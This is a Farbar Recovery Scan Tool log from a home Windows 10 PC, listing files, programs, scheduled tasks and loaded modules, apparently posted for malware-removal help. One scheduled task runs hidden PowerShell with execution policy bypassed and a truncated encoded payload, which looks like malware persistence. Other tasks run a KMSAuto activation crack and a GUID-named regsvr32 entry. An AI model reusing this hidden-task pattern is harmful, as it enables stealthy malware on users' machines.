2016-03-09 15:03 - 2015-12-29 21:24 - 00000000 ____D C:\ProgramData\Origin
2016-03-09 15:03 - 2015-12-29 20:51 - 00000000 ____D C:\Users\kevin\AppData\Roaming\uTorrent
2016-03-09 15:03 - 2015-10-30 18:21 - 00000000 ____D C:\Windows\INF
2016-03-09 15:01 - 2015-12-30 14:56 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-09 15:01 - 2015-12-30 14:55 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-09 15:01 - 2015-12-29 20:14 - 00000000 ____D C:\ProgramData\NVIDIA
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 15:01 - 2015-10-30 17:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-03-09 15:00 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin
2016-03-09 14:44 - 2016-01-10 22:34 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 14:40 - 2016-01-10 22:30 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-03-09 14:10 - 2015-12-29 20:18 - 00000000 ____D C:\Windows\system32\MRT
2016-03-09 14:07 - 2015-12-29 20:18 - 143659408 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-03-09 14:07 - 2015-10-30 18:11 - 00000000 ____D C:\Windows\CbsTemp
2016-03-09 12:23 - 2016-01-10 22:58 - 00000000 ____D C:\Users\kevin\AppData\Roaming\MPC-HC
2016-03-09 12:19 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin\AppData\Local\VirtualStore
2016-03-09 11:40 - 2015-12-29 20:10 - 00834360 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-09 11:22 - 2016-01-01 13:59 - 00004168 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{E6C01D44-E7E2-4358-B7BB-CE29091035DA}
2016-03-08 16:54 - 2015-10-30 18:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:54 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\AppReadiness
2016-03-08 16:49 - 2015-12-30 01:04 - 00226168 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2016-03-08 16:36 - 2015-12-30 01:04 - 00226168 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2016-03-08 16:33 - 2015-12-29 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-03-08 16:33 - 2015-12-29 20:14 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-03-08 16:32 - 2015-12-29 20:11 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-03-04 19:21 - 2015-07-13 20:45 - 12654024 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-03-04 17:50 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\rescache
2016-03-03 23:16 - 2015-12-29 20:19 - 01903344 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01571624 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01316184 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 00112216 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 00047760 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-03-03 23:16 - 2015-07-13 20:45 - 20061344 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 17320280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 14226672 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 03681488 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 03259360 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 00037702 _____ C:\Windows\system32\nvinfo.pb
2016-03-03 20:54 - 2016-01-01 14:24 - 00532536 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-03-03 20:54 - 2016-01-01 14:24 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 06371384 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 06200675 _____ C:\Windows\system32\nvcoproc.bin
2016-03-03 20:54 - 2015-12-29 20:14 - 02992576 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 02561472 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 01265720 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-03-03 20:54 - 2015-12-29 20:14 - 00392128 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-03-03 16:48 - 2015-12-29 19:59 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-02 23:04 - 2015-10-30 20:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 __RSD C:\Windows\Media
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\bcastdvr
2016-03-02 23:04 - 2015-10-30 17:28 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-03-02 23:04 - 2015-10-30 17:28 - 00000000 ____D C:\Windows\system32\Dism
2016-03-02 22:43 - 2016-01-01 14:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-02 12:03 - 2015-10-30 18:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-03-01 17:19 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin\AppData\Local\Packages
2016-03-01 12:56 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-24 19:50 - 2015-12-29 20:19 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-23 23:51 - 2015-10-30 18:24 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-02-23 23:43 - 2016-01-10 22:52 - 00000215 _____ C:\Prefs.js
2016-02-23 23:43 - 2016-01-10 22:52 - 00000000 ____D C:\searchplugins
2016-02-23 23:34 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\LiveKernelReports
2016-02-23 23:18 - 2016-01-16 20:23 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Xiaomi
2016-02-21 15:45 - 2016-01-10 22:34 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:45 - 2016-01-10 22:34 - 00002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-17 20:21 - 2015-12-30 18:17 - 00000000 ____D C:\Users\kevin\AppData\Local\CrashDumps
2016-02-15 18:13 - 2015-12-29 21:09 - 00000000 ____D C:\Users\kevin\AppData\Local\IPVanish
2016-02-15 18:13 - 2015-12-29 21:09 - 00000000 ____D C:\Program Files (x86)\IPVanish
2016-02-11 17:55 - 2015-12-29 20:01 - 00002367 _____ C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-11 17:55 - 2015-12-29 20:01 - 00000000 ___RD C:\Users\kevin\OneDrive
 
==================== Files in the root of some directories =======
 
2016-02-17 20:15 - 2016-02-17 02:25 - 0000001 _____ () C:\Users\kevin\AppData\Roaming\write 1234
2016-01-01 14:28 - 2016-01-01 14:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
Some files in TEMP:
====================
C:\Users\kevin\AppData\Local\Temp\avgnt.exe
C:\Users\kevin\AppData\Local\Temp\nvStInst.exe
C:\Users\kevin\AppData\Local\Temp\sfamcc00001.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-03-01 12:16
 
==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by kevin (2016-03-09 15:06:28)
Running from C:\
Windows 10 Pro Version 1511 (X64) (2015-12-29 08:57:51)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3312796164-3718684029-3865147747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3312796164-3718684029-3865147747-503 - Limited - Disabled)
Guest (S-1-5-21-3312796164-3718684029-3865147747-501 - Limited - Disabled)
kevin (S-1-5-21-3312796164-3718684029-3865147747-1001 - Administrator - Enabled) => C:\Users\kevin
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.2.172 - Adobe Systems, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.15.141 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Avira Scout (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\{3cc6cc67-d693-4af9-9320-241d34083394}) (Version: 16.2.15.170 - Avira Operations GmbH & Co. KG)
AviraScoutMsi (x32 Version: 16.02.15.00170 - Avira Operations GmbH & Co. KG) Hidden
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.7.2.45672 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Corsair Hydro Series 7289 USB Device (Driver Removal) (HKLM-x32\...\HYDROS7289&1B1C&0C02) (Version:  - Corsair Components, Inc.)
Corsair Link™ USB Dongle (Driver Removal) (HKLM-x32\...\SIUSBXP&1B1C&1C00) (Version:  - Corsair Memory, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HL-1210W series (HKLM-x32\...\{75E38F04-1BAF-4054-A059-57F831688943}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
Intel® Chipset Device Software (x32 Version: 10.1.1.8 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1156 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IPVanish (x32 Version: 2.0.5774.32119 - IPVanish.com) Hidden
IPVanish VPN (HKLM-x32\...\{9dd91e59-7b95-4634-bb48-2741f1460ecf}) (Version: 2.0.5774.32119 - IPVanish.com)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6568.2025 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 364.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.47 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.10.2.40 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.10.2.40 - NVIDIA Corporation)
NVIDIA Graphics Driver 364.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.47 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.10.1.1501 - Electronic Arts, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7560 - Realtek Semiconductor Corp.)
SHIELD Streaming (Version: 5.1.0270 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.10.2.40 - NVIDIA Corporation) Hidden
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spotify (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Spotify) (Version: 1.0.24.104.g92a22684 - Spotify AB)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3312796164-3718684029-3865147747-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\kevin\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0924AE62-8C02-4CB1-8D4D-EC7748C6A2AD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-02-04] (Microsoft Corporation)
Task: {44C58977-4DAD-42D5-B575-A286BC854E63} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2015-12-23] ()
Task: {4DB00FF7-AF9C-4A54-885E-3566BBF95577} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-27] (Adobe Systems Incorporated)
Task: {6DFFC430-6EA3-449C-BCA5-63BF16DAB159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-02-06] (Microsoft Corporation)
Task: {73149628-456D-4963-88EA-F756CF4EB817} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-10] (Google Inc.)
Task: {7C5AAB22-2E32-4952-98EB-EEF8F2937C02} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-09] (Piriform Ltd)
Task: {83113278-EA75-49B1-90C0-E877FB8916B4} - System32\Tasks\{8D2053D8-20E4-3EA4-F40B-3B75A24CA541} => C:\Windows\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {93831AC8-68A2-456B-8664-989A0650A7CB} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {AD59ADD5-2628-4698-B950-6DB035C2375E} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2016-03-01] (MSFree Inc.)
Task: {B3EE4E80-0097-4C92-BAA0-7D6257F67F15} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-02-04] (Microsoft Corporation)
Task: {B4A50DFE-42DB-4B8F-9926-236255622939} - System32\Tasks\{0F790B47-0F78-7F78-0D11-0809780B1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9480 more characters).
Task: {BA0ADDCE-A0D1-4BCC-A8DE-C2D2DE3331F0} - System32\Tasks\Start Corsair Link => C:\Program Files (x86)\Corsair\Corsair Link\CorsairLINK.exe
Task: {F03F0A17-F72D-4BBE-B060-D538A82CD88D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-02-06] (Microsoft Corporation)
Task: {F05682AA-517D-41EF-8FBA-A777F84ED3F5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-10] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 18:18 - 2015-10-30 18:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2015-12-29 20:14 - 2016-03-03 20:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-03-01 12:56 - 2016-02-04 05:51 - 00173256 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-03-08 16:33 - 2016-03-03 23:16 - 01416064 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2015-12-29 20:19 - 2016-03-03 23:16 - 00299392 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-03-08 16:33 - 2016-03-03 23:16 - 03613056 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-01-01 14:53 - 2016-01-01 14:53 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ () C:\Windows\system32\CoreUIComponents.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-03-02 12:01 - 2016-02-05 00:53 - 08914120 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2015-12-29 20:09 - 2015-12-07 15:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 13:25 - 2016-02-23 19:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00674816 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\MtcUvc.dll
2016-01-13 17:28 - 2016-01-05 12:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 17:28 - 2016-01-05 12:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 12:47 - 2016-01-16 16:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 12:47 - 2016-01-16 16:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-06-01 21:00 - 2015-06-01 21:00 - 00102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2015-12-29 20:19 - 2016-03-03 23:16 - 00020352 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-12-29 21:27 - 2016-02-02 20:59 - 01016832 _____ () C:\Program Files (x86)\Origin\platforms\qwindows.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00028160 _____ () C:\Program Files (x86)\Origin\imageformats\qgif.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00029696 _____ () C:\Program Files (x86)\Origin\imageformats\qico.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00256000 _____ () C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00266240 _____ () C:\Program Files (x86)\Origin\imageformats\qmng.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00023552 _____ () C:\Program Files (x86)\Origin\imageformats\qtga.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00346112 _____ () C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00023552 _____ () C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2015-12-29 21:27 - 2016-02-02 20:59 - 00243200 _____ () C:\Program Files (x86)\Origin\mediaservice\wmfengine.dll
2016-03-02 22:43 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-02-21 15:44 - 2016-02-18 15:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-21 15:44 - 2016-02-18 15:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2016-02-21 15:44 - 2016-02-18 15:15 - 16808600 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\localhost -> localhost
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
